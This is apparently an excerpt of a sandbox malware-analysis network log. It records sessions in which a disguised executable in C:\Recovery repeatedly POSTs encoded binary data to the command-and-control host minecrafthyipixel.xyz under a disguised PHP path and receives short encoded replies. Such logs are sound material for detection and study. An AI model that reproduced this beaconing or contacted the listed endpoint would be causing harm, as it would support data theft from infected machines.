                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2172
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                     Apr 19, 2024 13:43:14.670918941 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                     Apr 19, 2024 13:43:14.671087027 CEST | 2172 | OUT | Data Raw: 52 59 5e 5b 59 41 54 5d 5c 5e 59 59 57 54 58 59 54 5a 5f 5d 54 5d 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RY^[YAT]\^YYWTXYTZ_]T]SY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%&-65+(Y&0+%+">;+X&*8T2"R4"*V=+"?<:5$[. X )
                                                                                                                                     Apr 19, 2024 13:43:14.961277962 CEST | 764 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:14 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g61dBE86lUh65Onu4wUJGNCTsOiB13K1qIYI8Z5QFAaK0FosvBc3Fu9yY4PK5XV2EcMOYCHxfW2UY%2FIe6KhBWMjGaxvwOkeE352rTl66z4qpsqnAUOjwmfYmfwRErz2OAhHSAyf3nwY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2c46fd24531-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 27 07 24 1f 2a 59 20 39 3f 58 29 33 22 1c 3d 27 2a 06 3e 5f 26 03 34 5b 2b 0d 2f 14 38 5b 3c 2b 00 17 32 30 21 52 27 13 23 08 25 1a 21 59 00 1a 3a 04 22 3f 3d 11 2e 07 3e 02 2a 31 22 02 23 0c 3f 16 2a 2e 21 50 34 06 2f 18 3d 3e 21 53 38 2b 24 51 3c 06 36 02 2f 24 35 06 21 01 2c 52 09 12 25 1a 3c 38 2c 5b 27 23 21 56 37 32 24 13 3f 3c 32 58 33 02 20 1c 24 30 28 5f 3a 0b 25 0f 32 00 36 0c 29 2a 3c 1f 37 3c 21 1b 31 3e 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98'$*Y 9?X)3"='*>_&4[+/8[<+20!R'#%!Y:"?=.>*1"#?*.!P4/=>!S8+$Q<6/$5!,R%<8,['#!V72$?<2X3 $0(_:%26)*<7<!1>.^,+H0TW
                                                                                                                                     Apr 19, 2024 13:43:14.961371899 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                     65 | 192.168.2.4 | 49814 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                                     Apr 19, 2024 13:43:14.689846992 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                     Apr 19, 2024 13:43:14.794557095 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                     Apr 19, 2024 13:43:14.795125961 CEST | 2512 | OUT | Data Raw: 57 5a 5e 5a 59 45 54 55 5c 5e 59 59 57 55 58 5d 54 56 5f 5d 54 58 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ^ZYETU\^YYWUX]TV_]TXS_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%1U"+'#4%8!V*87\2: &(= "6U=]$"?,/%$[. X -
                                                                                                                                     Apr 19, 2024 13:43:15.094398022 CEST | 621 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:15 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=82uM9j8HsvHMtAyqA1Mv5QzYObsW5Q%2Bwf0YXfesLWOD8VB5QFNtgtD%2B8kXhlELwWyaRGAh7U25NKlLAqRhPiXRtOm%2F0WeVTqHi%2B6uddiMeGAjYyoYrRYGMAOojenhCfeWtvlLPlzDDw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2c52c22b02c-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                     Apr 19, 2024 13:43:15.094460964 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                     66 | 192.168.2.4 | 49815 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                                     Apr 19, 2024 13:43:15.332034111 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                     Apr 19, 2024 13:43:15.436494112 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                     Apr 19, 2024 13:43:15.436656952 CEST | 2512 | OUT | Data Raw: 52 5e 5b 5c 59 45 54 5c 5c 5e 59 59 57 53 58 53 54 50 5f 56 54 5c 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R^[\YET\\^YYWSXSTP_VT\S]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%&6]8[33;^'85W=?X2*,$+) 6)/^4Z0-$[. X 5
                                                                                                                                     Apr 19, 2024 13:43:15.727946043 CEST | 621 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:15 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZbTA08ieJ6LhdVtoh5pUUlxfwpJdHxx%2Fd4C4gzAq6t5uzk2E0bmVYFHnzEUB9dKz4GjpQhMe4wqyFFDk%2Fmk0AkpBiBrtZj%2F9RjPXaif%2FFeyAkTVQtDZxtPF389lIbkyKkcf8zVcOjpA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2c92ea5b032-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                     Apr 19, 2024 13:43:15.728005886 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.4 | 49816 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:15.984397888 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:16.088918924 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:16.089243889 CEST | 2512 | OUT | Data Raw: 52 5a 5b 5e 59 4a 51 5a 5c 5e 59 59 57 56 58 5b 54 54 5f 5f 54 55 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RZ[^YJQZ\^YYWVX[TT__TUSZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%^2=2R5;4Y$3?'1W?+7Y%$T1;.Q#5>;?4<_9$[. X !
Apr 19, 2024 13:43:16.452214003 CEST | 617 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:16 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cm9gMx7l3fvA2B05hEA0oz8KpZNYfDR8PyH6XQ7hRZUJIskpNdgSpb7Frb8hV03yTOSiq0rVRXYyK7OarFVnFyPgoYW9O5avKwXm5xC8E1np1%2BnaG3ireIgVc0nPB%2Bd8UXXiHrGHTAM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2cd3cb1135d-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:16.452276945 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.4 | 49817 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:16.671962023 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:16.776695013 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:16.776875019 CEST | 2512 | OUT | Data Raw: 57 5b 5e 5a 5c 40 51 58 5c 5e 59 59 57 54 58 52 54 57 5f 56 54 5d 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W[^Z\@QX\^YYWTXRTW_VT]S]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%%-*W ;X3 0$->+$')82]!!2&Q)^7/$_-%$[. X )
Apr 19, 2024 13:43:17.150342941 CEST | 625 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:17 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nR0bXLfp7DMTPCKzm7ISLcxLpaoAUoF%2FtOnPfxDSA3kM0V1XU659JLPXPQw4UK%2B8DcWVFU7wcCCfDZwgS43IdTK2IVzaUMM9%2FAz2jnFwuuooMK65yi%2F3YtGPkVlPiH2UgM%2Fcp%2BQRSmA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2d18e067bbe-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:17.150393009 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.4 | 49818 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:17.376467943 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:17.481291056 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:17.481436968 CEST | 2512 | OUT | Data Raw: 52 5a 5e 5a 59 42 54 5b 5c 5e 59 59 57 52 58 52 54 57 5f 5c 54 58 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RZ^ZYBT[\^YYWRXRTW_\TXSW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%[2.%"''+Z3=)Y&81Q 1")]#Z#, ^9$[. X 1
Apr 19, 2024 13:43:17.833276987 CEST | 629 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:17 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fWG%2F0SMFwRcxkbNBdLarRDX3f2VbnZSAdtx4SKWp9oka8aHzRLu3EbDlfKle4CT%2F5Gxh7Vhb%2BEl%2FmdP%2FHf%2B8NPigAnNnX7u2q8Uw9CyE59%2Buu1j0YJGIXgGexV4B5b%2FhUOZImi37rSM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2d5fd5b4581-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:17.833338022 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.4 | 49819 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:18.075875044 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:18.180556059 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:18.180996895 CEST | 2504 | OUT | Data Raw: 57 5e 5e 5d 59 47 51 5e 5c 5e 59 59 57 57 58 53 54 54 5f 58 54 58 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W^^]YGQ^\^YYWWXSTT_XTXSV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%\2>5;,X$V7385P=\%,R%+S#12P=;$7<'-%$[. X
Apr 19, 2024 13:43:18.548439980 CEST | 619 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:18 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pWDYuOmnVfuPH5HdshgbycMMXDJ8ZOnpE9DvnZNcwUR1Dyox30QAdtfZt4rt0Z8kc3xZ3z5lnYg0hvhtDpJyrWUHnLR7RIpGnqb%2FW87S7anV8dgDGenCyacUY46Cf4MKo%2F3%2FuCBTtTc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2da48a653f0-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:18.548502922 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.4 | 49820 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:18.781610012 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:18.886423111 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:18.886598110 CEST | 2512 | OUT | Data Raw: 57 54 5e 5d 5c 43 54 5f 5c 5e 59 59 57 55 58 52 54 57 5f 5b 54 5e 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WT^]\CT_\^YYWUXRTW_[T^S]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&'>T!(7$('+?((%),U245*(+ /$/%$[. X -
Apr 19, 2024 13:43:19.140554905 CEST | 625 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:19 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BqQPhrpIgPTIL3e73GvsORmFeys8QMXCn%2F4Yk%2FhHELYXHefz5NreUUdoqlA1plOUXA19%2Fx4GtbUb6wQ9cOSC2VsTCJRk5AzcQf6Rf%2BBLOzzJMeSmukvkcssbJT5XD%2FluLrRiVLYPDZ8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2debdf94563-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:19.140613079 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.4 | 49821 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:19.757041931 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2500
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:19.861929893 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:19.862140894 CEST | 2500 | OUT | Data Raw: 57 5f 5b 5f 59 40 54 58 5c 5e 59 59 57 57 58 5b 54 51 5f 56 54 58 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W_[_Y@TX\^YYWWX[TQ_VTXSV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%^2>R5(4['V$'+>((1_<172">8(#Z,^9$[. X -
                                                                                                                                    Apr 19, 2024 13:43:20.121499062 CEST  615  IN  HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:20 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ehrtLph5rrfb8UOtNhjOoeBxDmR81O%2BhY4Yd9fT4dPpj2d5rZ8IvKXJ3bjwxPoMVvUWlpU5GcPMkUY53CTAFaoLhpAQKH9bp61zVGENG2gWTi7UbEak8aeBY0o0v0efQK5nX6eieZXA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2e4df6b4569-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
